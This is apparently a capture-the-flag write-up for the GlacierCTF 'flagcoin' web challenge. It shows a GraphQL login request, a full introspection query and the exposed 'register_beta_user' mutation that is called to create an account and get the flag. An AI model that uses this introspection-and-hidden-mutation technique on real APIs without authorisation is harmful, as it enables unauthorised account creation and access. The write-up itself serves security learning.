When logging into the webapp it's making a post request to the `/graphql` endpoint using a mutation query.
```HTML
POST /graphql HTTP/2
Host: flagcoin.ctf.glacierctf.com
Content-Type: application/json
{"query":"\n mutation($username: String!, $password: String!) { \n login(username: $username, password: $password) { \n username \n } \n }\n ","variables":{"username":"teststyle","password":"teststyle"}}
```
Using a GraphQL introspection query we can pull all of the available fields to query
```JSON
{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
```
Response:
```JSON
{"name":"register_beta_user","description":null,"args":[{"name":"username","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null},{"name":"password","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null}
```
We see a `register_beta_user` function. Replacing the `login` function with the `register_beta_user` function we get a valid user and then log in to get the flag.
```HTML
POST /graphql HTTP/2
Host: flagcoin.ctf.glacierctf.com
Content-Type: application/json
{"query":"\n mutation($username: String!, $password: String!) { \n register_beta_user(username: $username, password: $password) { \n username \n } \n }\n ","variables":{"username":"teststyle","password":"teststyle"}}
```
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #graphql #web #api
Related: